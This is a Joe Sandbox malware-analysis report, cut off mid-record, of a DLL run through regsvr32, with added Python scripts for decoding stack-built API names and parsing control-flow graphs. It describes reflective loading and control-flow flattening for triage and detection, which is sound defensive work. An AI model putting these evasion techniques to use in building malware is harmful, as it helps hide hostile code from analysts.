90->60 106 640960-64096c 92->106 107 64096e-640979 92->107 109 6409a2-6409a4 93->109 110 64097f-640981 93->110 111 640680-64068a 94->111 112 64068c-640690 94->112 108 6406bd-6406be 95->108 96->70 97->97 113 640786 97->113 102 640a4c-640a54 98->102 103 640a7b-640a8e 98->103 100 640a38-640a3e 99->100 100->98 114 640a29-640a35 100->114 135 640835-640839 101->135 136 6407d6-6407d9 101->136 102->103 115 640a56-640a79 RtlAddFunctionTable 102->115 103->34 104->72 124 6408b3-6408b9 105->124 125 6408bb-6408c8 105->125 116 6409be-6409bf 106->116 107->116 108->78 122 6409a6-6409aa 109->122 123 6409ac-6409bb 109->123 117 640983-640987 110->117 118 640989-64098b 110->118 119 6406b6-6406ba 111->119 120 6406a5-6406a9 112->120 121 640692-6406a3 112->121 113->81 114->100 115->103 130 6409c5-6409cb 116->130 117->116 118->109 128 64098d-64098f 118->128 119->108 120->108 129 6406ab-6406b3 120->129 121->119 122->116 123->116 131 6408ea-6408fe 124->131 132 6408d3-6408e5 125->132 133 6408ca-6408d1 125->133 137 640991-640997 128->137 138 640999-6409a0 128->138 129->119 139 6409cd-6409d3 130->139 140 6409d9-6409e9 VirtualProtect 130->140 131->104 146 640900-640905 131->146 132->131 133->132 133->133 144 640844-640850 135->144 145 64083b 135->145 142 6407e3-6407f0 136->142 143 6407db-6407e1 136->143 137->116 138->130 139->140 140->85 148 6407f2-6407f9 142->148 149 6407fb-64080d 142->149 147 640812-64082c 143->147 144->101 150 640856-640857 144->150 145->144 146->105 147->135 152 64082e-640833 147->152 148->148 148->149 149->147 150->88 152->136
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358032126.0000000000640000.00000040.00001000.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_640000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                    • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                    • API String ID: 394283112-2517549848
                                                                    • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction ID: 2b89885f4bda90b06087f226635409d9579f169d94dbdea8471b0d4696e3ee9a
                                                                    • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                    • Instruction Fuzzy Hash: F472D530618B588FDB29DF18C8856F9B7E1FB98305F10562DE98BC7211DB34D986CB86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
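The String ID list above for the stub at 0x640000 is made up entirely of four-byte pieces of Windows API names (Virt/ualA/lloc, GetN/ativ/eSys/temI, RtlA/ddFu/ncti/onTa, Flus/hIns/truc/tion/Cach, and Find/Load/Lock/Free/Size next to four copies of Reso/urce). That is what the strings extractor sees when a loader writes each name onto the stack four bytes at a time rather than carrying it in plaintext, and it matches the API ID the plugin recorded for the function (VirtualAlloc, VirtualProtect, GetNativeSystemInfo, RtlAddFunctionTable). The script below, an added example and not part of the report or of Joe Sandbox, reassembles that fragment list against a candidate set of API names; the candidate list and the four-byte chunk width are assumptions made for the example, and a trailing chunk shorter than four bytes (where an A/W suffix often lands) is treated as optional because the extractor would not have reported it.

```python
from collections import Counter

# "String ID" list Joe Sandbox printed for the function at 0x640000 (copied
# from the report above): every entry is exactly four printable bytes.
FRAGMENTS = (
    "Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$"
    "Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$"
    "sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce"
).split("$")

# Names to test against the pool. This list is an assumption made for the
# example (APIs a reflective loader commonly resolves), not something the
# report states; extend it as needed.
CANDIDATES = [
    "VirtualAlloc", "VirtualProtect", "VirtualFree", "GetNativeSystemInfo",
    "RtlAddFunctionTable", "FlushInstructionCache", "FindResource",
    "LoadResource", "LockResource", "SizeofResource", "FreeResource",
    "LoadLibraryA", "GetProcAddress", "Sleep", "CreateProcessW", "ExitProcess",
]

CHUNK = 4  # width of the immediates the stub stores to the stack (assumed)


def chunks(name, size=CHUNK):
    """Split a name the way a stack-string writer does: fixed-width pieces."""
    return [name[i:i + size] for i in range(0, len(name), size)]


def match_stack_strings(fragments, candidates, size=CHUNK):
    """Return (matched name -> chunks used, unmatched names, leftover pool).

    Every full-width chunk of a name must be in the pool and is consumed, so
    one fragment cannot serve two names. A trailing chunk shorter than `size`
    is optional: the string extractor drops it as too short, and an A/W
    suffix often ends up there. Candidates are tried longest first so names
    with more chunks get first claim on shared pieces such as "Reso"/"urce".
    """
    pool = Counter(fragments)
    matched, unmatched = {}, []
    for name in sorted(candidates, key=lambda n: -len(n)):
        required = [p for p in chunks(name, size) if len(p) == size]
        need = Counter(required)
        if all(pool[p] >= k for p, k in need.items()):
            pool.subtract(need)
            matched[name] = required
        else:
            unmatched.append(name)
    return matched, sorted(unmatched), +pool  # +pool drops zero counts


if __name__ == "__main__":
    found, missing, rest = match_stack_strings(FRAGMENTS, CANDIDATES)
    for name in sorted(found):
        print(f"{name:22s} <- {' '.join(found[name])}")
    print("not covered:", ", ".join(missing))
    print("unused fragments:", dict(rest))
```

Run against the fragment list from this report, every one of the 38 fragments is consumed by twelve names (the four Virtual/system-info/unwind-table APIs plus the resource, LoadLibraryA, FlushInstructionCache and Sleep family), while VirtualFree, GetProcAddress, CreateProcessW and ExitProcess fail on their first missing chunk. A zero leftover is the useful signal: it means the whole string table of that function is explained by stack-built API names, which is worth a note in the triage write-up even before the stub is decompiled.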

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                    • API String ID: 0-464535774
                                                                    • Opcode ID: af6d23bac9e0564b4dade6cc976aa0f49490c733fc6aa684993268249fb5a7be
                                                                    • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                    • Opcode Fuzzy Hash: af6d23bac9e0564b4dade6cc976aa0f49490c733fc6aa684993268249fb5a7be
                                                                    • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 287 180007958-1800079e2 call 1800142a0 290 1800079e5-1800079eb 287->290 291 1800079f1 290->291 292 180007f68-180007f6e 290->292 295 180007eb7-180007f4d call 180021434 291->295 296 1800079f7-1800079fd 291->296 293 180008084-1800080f6 call 180021434 292->293 294 180007f74-180007f7a 292->294 309 1800080fb-180008101 293->309 297 180007fb4-180008075 call 18001e794 294->297 298 180007f7c-180007f82 294->298 310 180007f52-180007f58 295->310 299 180007d01-180007e4c call 180008738 296->299 300 180007a03-180007a09 296->300 317 18000807a-18000807f 297->317 303 180007f84-180007f8a 298->303 304 180007f9a-180007faf 298->304 299->317 326 180007e52-180007eaf call 18001d408 299->326 305 180007c76-180007cf7 call 180013e28 300->305 306 180007a0f-180007a15 300->306 312 18000811e-180008124 303->312 313 180007f90-180007f95 303->313 304->290 305->299 314 180007a1b-180007a21 306->314 315 180007b1d-180007c71 call 180018c60 call 180001b1c 306->315 318 180008103-180008108 309->318 319 18000810d 309->319 320 1800081dd-1800081fd 310->320 321 180007f5e 310->321 312->320 322 18000812a 312->322 313->290 324 180007a27-180007a2d 314->324 325 18000812f-1800081d8 call 180013e28 314->325 329 180008112-18000811b 315->329 328 180007b0c-180007b18 318->328 319->329 321->292 322->290 324->312 331 180007a33-180007af3 call 18002b4c4 324->331 325->320 326->295 328->290 329->312 338 180007af8-180007b06 331->338 338->328
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 0n)G$9i&$IS_$c)K$oh$oh$J
                                                                    • API String ID: 0-4168131144
                                                                    • Opcode ID: a2fd07809090c8a4a54937da8c6413b95d54b2adce31cd57800155d5b9f01661
                                                                    • Instruction ID: 1745985c1503e7a5a98bbeacef01b65c9f03634c62e3202666f04ad1fcc3199d
                                                                    • Opcode Fuzzy Hash: a2fd07809090c8a4a54937da8c6413b95d54b2adce31cd57800155d5b9f01661
                                                                    • Instruction Fuzzy Hash: 69423870A0470CABCB58DF68C58AADEBBF1FB44304F40C169EC4AAB250D7759B19CB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    control_flow_graph 389 180010ff4-180011016 390 180011020 389->390 391 180011022-180011028 390->391 392 180011814 391->392 393 18001102e-180011034 391->393 394 180011819-18001181f 392->394 395 1800114e2-1800114ec 393->395 396 18001103a-180011040 393->396 394->391 399 180011825-180011832 394->399 397 1800114f5-18001151d 395->397 398 1800114ee-1800114f3 395->398 400 1800113e2-1800114d2 call 180008200 396->400 401 180011046-18001104c 396->401 403 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 397->403 398->403 400->399 410 1800114d8-1800114dd 400->410 401->394 402 180011052-18001120b call 180021040 call 1800291ac 401->402 415 180011212-1800113d7 call 1800291ac call 18001e2bc 402->415 416 18001120d 402->416 419 1800117f9-180011803 403->419 410->391 415->399 424 1800113dd 415->424 416->415 419->399 421 180011805-18001180f 419->421 421->391 424->390
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                    • API String ID: 0-3528011396
                                                                    • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                    • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                    • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%
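The control_flow_graph lines in this report are a one-line serialisation of the plugin's graph: a decimal block id followed by its address or address range, optional annotations (call <target>, * N for a call repeated N times, or a bare API name), and src->dst edges. Read that way, the 0x640000 graph above shows VirtualAlloc, GetNativeSystemInfo, a second VirtualAlloc, VirtualProtect and RtlAddFunctionTable in address order, and its most-entered block is the tail block at 0x640a91 that many checks fall through to; the 0x180010ff4 graph instead has several back edges into the short block at 0x180011022, the shape of a flattened dispatcher loop. The parser below is an added example, not part of the report or of the Joe Sandbox IDA plugin, and its two inputs are constructed samples in that format: one keeps real block ids and addresses of the 0x640000 stub but only a handful of its edges, the other is shaped like the 0x180010ff4 loop. Nothing in it is the plugin's own code.

```python
import re
from collections import Counter, namedtuple

EDGE_RE = re.compile(r"^(\d+)->(\d+)$")
# One hex address or a hex range; six-plus digits so that small decimal tokens
# (block ids, "* 2" repeat counts) are never mistaken for an address.
ADDR_RE = re.compile(r"^([0-9a-f]{6,})(?:-([0-9a-f]{6,}))?$")

Cfg = namedtuple("Cfg", "blocks edges")
# notes holds ordered annotations: ["call", 0x640aa8, 2] or ["api", "VirtualAlloc", 1]
Block = namedtuple("Block", "bid start end notes")


def parse_cfg(line):
    """Parse one 'control_flow_graph ...' line into blocks and edges."""
    tokens = line.split()
    if tokens and tokens[0] == "control_flow_graph":
        tokens = tokens[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(tokens):
        tok = tokens[i]
        if m := EDGE_RE.match(tok):                      # "src->dst"
            edges.append((int(m.group(1)), int(m.group(2))))
            i += 1
        elif tok.isdigit() and i + 1 < len(tokens) and (a := ADDR_RE.match(tokens[i + 1])):
            start = int(a.group(1), 16)                  # "<id> <start>[-<end>]"
            end = int(a.group(2), 16) if a.group(2) else start
            cur = blocks[int(tok)] = Block(int(tok), start, end, [])
            i += 2
        elif cur is None:
            raise ValueError(f"annotation {tok!r} before any block")
        elif tok == "call":                              # "call <hex target>"
            cur.notes.append(["call", int(tokens[i + 1], 16), 1])
            i += 2
        elif tok == "*":                                 # "* N" repeats the last annotation
            cur.notes[-1][2] = int(tokens[i + 1])
            i += 2
        else:                                            # bare name: an API call
            cur.notes.append(["api", tok, 1])
            i += 1
    if unknown := {b for e in edges for b in e} - set(blocks):
        raise ValueError(f"edges reference unknown blocks: {sorted(unknown)}")
    return Cfg(blocks, edges)


def api_sequence(cfg):
    """Named API calls in address order, repeated per their '* N' count."""
    return [val for b in sorted(cfg.blocks.values(), key=lambda b: b.start)
            for kind, val, n in b.notes if kind == "api" for _ in range(n)]


def callees(cfg):
    """Internal call targets and how often each is called."""
    c = Counter()
    for kind, val, n in (note for b in cfg.blocks.values() for note in b.notes):
        if kind == "call":
            c[val] += n
    return c


def in_degree(cfg):
    """Incoming edges per block. The top block is often just a shared exit."""
    deg = Counter({bid: 0 for bid in cfg.blocks})
    deg.update(d for _, d in cfg.edges)
    return deg


def back_edges(cfg):
    """Edges whose target is not above the source: loops and self-loops."""
    return [(s, d) for s, d in cfg.edges if cfg.blocks[d].start <= cfg.blocks[s].start]


def dispatcher(cfg):
    """Block that two or more back edges return to (a flattening loop head), else None."""
    heads = Counter(d for _, d in back_edges(cfg)).most_common(1)
    return heads[0][0] if heads and heads[0][1] >= 2 else None


# Constructed samples in the report's format (not the page's exact graphs):
# LOADER keeps real block ids/addresses of the 0x640000 stub but only a few of
# its edges; FLATTENED is shaped like the 0x180010ff4 function's dispatcher loop.
LOADER = ("control_flow_graph 8 640000-640460 call 640aa8 * 2 VirtualAlloc 30 640462-640466 8->30 "
          "31 64048a-640494 8->31 32 640468-640488 30->32 34 640a91-640aa6 31->34 "
          "35 64049a-64049e 31->35 32->31 32->32 35->34 43 640531-640567 GetNativeSystemInfo "
          "35->43 43->34 46 64056d-640589 VirtualAlloc 43->46 45 640513-640518 46->45 "
          "47 640521 45->47 47->43 140 6409d9-6409e9 VirtualProtect 46->140 140->34 "
          "115 640a56-640a79 RtlAddFunctionTable 140->115 115->34")
FLATTENED = ("control_flow_graph 389 180010ff4-180011016 390 180011020 389->390 "
             "391 180011022-180011028 390->391 392 180011814 391->392 393 18001102e-180011034 "
             "391->393 394 180011819-18001181f 392->394 395 1800114e2-1800114ec 393->395 "
             "396 18001103a-180011040 393->396 394->391 400 1800113e2-1800114d2 call 180008200 "
             "396->400 401 180011046-18001104c 396->401 410 1800114d8-1800114dd 400->410 "
             "410->391 401->394")

if __name__ == "__main__":
    for label, text in ("loader", LOADER), ("flattened", FLATTENED):
        cfg = parse_cfg(text)
        print(f"{label}: {len(cfg.blocks)} blocks, {len(cfg.edges)} edges")
        print("  APIs in address order:", api_sequence(cfg))
        print("  callees:", {hex(k): v for k, v in callees(cfg).items()})
        print("  most-entered block:", in_degree(cfg).most_common(1)[0])
        print("  back edges:", back_edges(cfg), "dispatcher:", dispatcher(cfg))
```

The two views complement each other. On the loader sample the API order alone reads as a reflective-load sequence (allocate, query page granularity, allocate again, set section protections, register unwind data), the only back edges are a self-loop and a short copy loop, and the most-entered block is the common exit, so dispatcher() is None. On the flattened sample there is no imported API at all, every handler returns to the same low-address block, and dispatcher() names it; that block is where to break when stepping such a function, since every state passes through it. The full graph lines from this report paste straight into parse_cfg() unchanged.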

                                                                    Control-flow Graph

                                                                    control_flow_graph 425 180021618-180021653 426 180021655-18002165a 425->426 427 180021bf3-180021c25 426->427 428 180021660-180021665 426->428 429 180021c2a-180021c2f 427->429 430 180021a81-180021bda call 180016314 428->430 431 18002166b-180021670 428->431 433 180021838-180021845 429->433 434 180021c35 429->434 440 180021bdf-180021bee 430->440 435 1800219f3-180021a7c call 180001b1c 431->435 436 180021676-18002167b 431->436 434->426 435->426 437 1800219e4-1800219ee 436->437 438 180021681-180021686 436->438 437->426 441 1800219d5-1800219df call 18001dfb4 438->441 442 18002168c-180021691 438->442 440->426 441->426 444 180021697-18002169c 442->444 445 18002190c-1800219a5 call 18000abac 442->445 447 1800216a2-1800216a7 444->447 448 180021846-180021907 call 180021434 444->448 453 1800219aa-1800219b0 445->453 447->429 451 1800216ad-180021835 call 180008200 call 1800166c0 447->451 448->426 451->433 454 1800219b2-1800219c6 453->454 455 1800219cb-1800219d0 453->455 454->426 455->426
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $&.+$)O$.pN$F>9$t(/
                                                                    • API String ID: 0-3036092626
                                                                    • Opcode ID: af092a803e8c5a8f60e198926b85640c086359e1e86988e2bc1304063bab4e4b
                                                                    • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                    • Opcode Fuzzy Hash: af092a803e8c5a8f60e198926b85640c086359e1e86988e2bc1304063bab4e4b
                                                                    • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: :G$Q27$_5$yy8x$Mh
                                                                    • API String ID: 0-3587547327
                                                                    • Opcode ID: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                    • Instruction ID: f758bc8895b8ed7f582f71be29fb7142b0f1d07f9cbefdc8313849e51cf7b1d3
                                                                    • Opcode Fuzzy Hash: 315710b1bd8495485e823c5d8e4dda2fa20a4e0309c27e75a691e805bd33ac06
                                                                    • Instruction Fuzzy Hash: 3DF1E07051434CEBDFA9DF68C8CAA9D3BA0FF48394FA06219FD0696250D775D988CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: +#;)$K'$sf$w\H
                                                                    • API String ID: 0-1051058546
                                                                    • Opcode ID: 4270ae10590fc2f5bcc1345d173ce3869455f0ae6b4cef3f0208413052bdacb8
                                                                    • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                    • Opcode Fuzzy Hash: 4270ae10590fc2f5bcc1345d173ce3869455f0ae6b4cef3f0208413052bdacb8
                                                                    • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: <4P$<8$<w.
                                                                    • API String ID: 0-1030867500
                                                                    • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                    • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                    • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: %'#$'1O"
                                                                    • API String ID: 0-3508158491
                                                                    • Opcode ID: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                    • Instruction ID: 10e181b0c1a65fbc894e9b150557277c676d109d9ee8fa061bdc989f931bd19f
                                                                    • Opcode Fuzzy Hash: 7a3bc090f4985b1e57649fadf31b142a2b067212ca7952ade99d041dbd471a2f
                                                                    • Instruction Fuzzy Hash: A541C471D1471C9FCB84CFA8D98AACDBBF0FB48354F249119E445B6250D3B85988CF69
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: xDC
                                                                    • API String ID: 0-90241050
                                                                    • Opcode ID: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                    • Instruction ID: 9121b1bc5c885adbeef7a29f5b0494aad7ac2618abc594bea640adf26706a648
                                                                    • Opcode Fuzzy Hash: 1794493f14346c80bf95ebec7e4fc927d8b172e8d91b7fcff559d0595d0365ee
                                                                    • Instruction Fuzzy Hash: F391387052065CEBDB99DF68C8CAADD3BA0FB48394F906219FC4287250C775D9C98B86
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358821467.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_180001000_regsvr32.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                    • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                    • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                    • String ID:
                                                                    • API String ID: 994105223-0
                                                                    • Opcode ID: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                    • Instruction ID: 3b1fd2f4930ba6a6b24feec85842e94aced33f0689b31d0c510e93990c904754
                                                                    • Opcode Fuzzy Hash: f850f7f34601db923eac004d86ac393417d210c29532925b20230ca42a5e0836
                                                                    • Instruction Fuzzy Hash: 3A419F31A09B6686EB34AF11B56E03A73A1FF88BC0F1444B4DA6E83B54CE3CE458C701
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    APIs
                                                                      • Part of subcall function 00007FF8CA9B4110: HeapCreate.KERNELBASE(?,?,?,?,00007FF8CA9B2169), ref: 00007FF8CA9B4122
                                                                      • Part of subcall function 00007FF8CA9B4110: HeapSetInformation.KERNEL32 ref: 00007FF8CA9B414C
                                                                    • _RTC_Initialize.LIBCMT ref: 00007FF8CA9B2184
                                                                    • GetCommandLineA.KERNEL32 ref: 00007FF8CA9B2189
                                                                      • Part of subcall function 00007FF8CA9B3EEC: GetEnvironmentStringsW.KERNELBASE(?,?,?,?,?,?,?,00007FF8CA9B219B), ref: 00007FF8CA9B3F1B
                                                                      • Part of subcall function 00007FF8CA9B3EEC: GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF8CA9B219B), ref: 00007FF8CA9B3F5B
                                                                      • Part of subcall function 00007FF8CA9B3758: GetStartupInfoA.KERNEL32 ref: 00007FF8CA9B377D
                                                                    • __setargv.LIBCMT ref: 00007FF8CA9B21B2
                                                                    • _cinit.LIBCMT ref: 00007FF8CA9B21C6
                                                                      • Part of subcall function 00007FF8CA9B2C94: FlsFree.KERNEL32(?,?,?,?,00007FF8CA9B2217), ref: 00007FF8CA9B2CA3
                                                                      • Part of subcall function 00007FF8CA9B2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9B2217), ref: 00007FF8CA9B6A32
                                                                      • Part of subcall function 00007FF8CA9B2C94: free.LIBCMT ref: 00007FF8CA9B6A3B
                                                                      • Part of subcall function 00007FF8CA9B2C94: DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8CA9B2217), ref: 00007FF8CA9B6A5B
                                                                      • Part of subcall function 00007FF8CA9B3108: Sleep.KERNEL32(?,?,0000000A,00007FF8CA9B2DA3,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B314D
                                                                    • FlsSetValue.KERNEL32 ref: 00007FF8CA9B224C
                                                                    • GetCurrentThreadId.KERNEL32 ref: 00007FF8CA9B2260
                                                                    • free.LIBCMT ref: 00007FF8CA9B226F
                                                                      • Part of subcall function 00007FF8CA9B3024: HeapFree.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B303A
                                                                      • Part of subcall function 00007FF8CA9B3024: _errno.LIBCMT ref: 00007FF8CA9B3044
                                                                      • Part of subcall function 00007FF8CA9B3024: GetLastError.KERNEL32(?,?,00000000,00007FF8CA9B2DDC,?,?,?,00007FF8CA9B2DFF,?,?,?,00007FF8CA9B254F,?,?,?,00007FF8CA9B262A), ref: 00007FF8CA9B304C
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.358961116.00007FF8CA971000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8CA970000, based on PE: true
                                                                    • Associated: 00000002.00000002.358952924.00007FF8CA970000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359057014.00007FF8CA9C2000.00000002.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359096389.00007FF8CA9C6000.00000004.00000001.01000000.00000005.sdmp
                                                                    • Associated: 00000002.00000002.359119749.00007FF8CA9C9000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_7ff8ca970000_regsvr32.jbxd
                                                                    Similarity
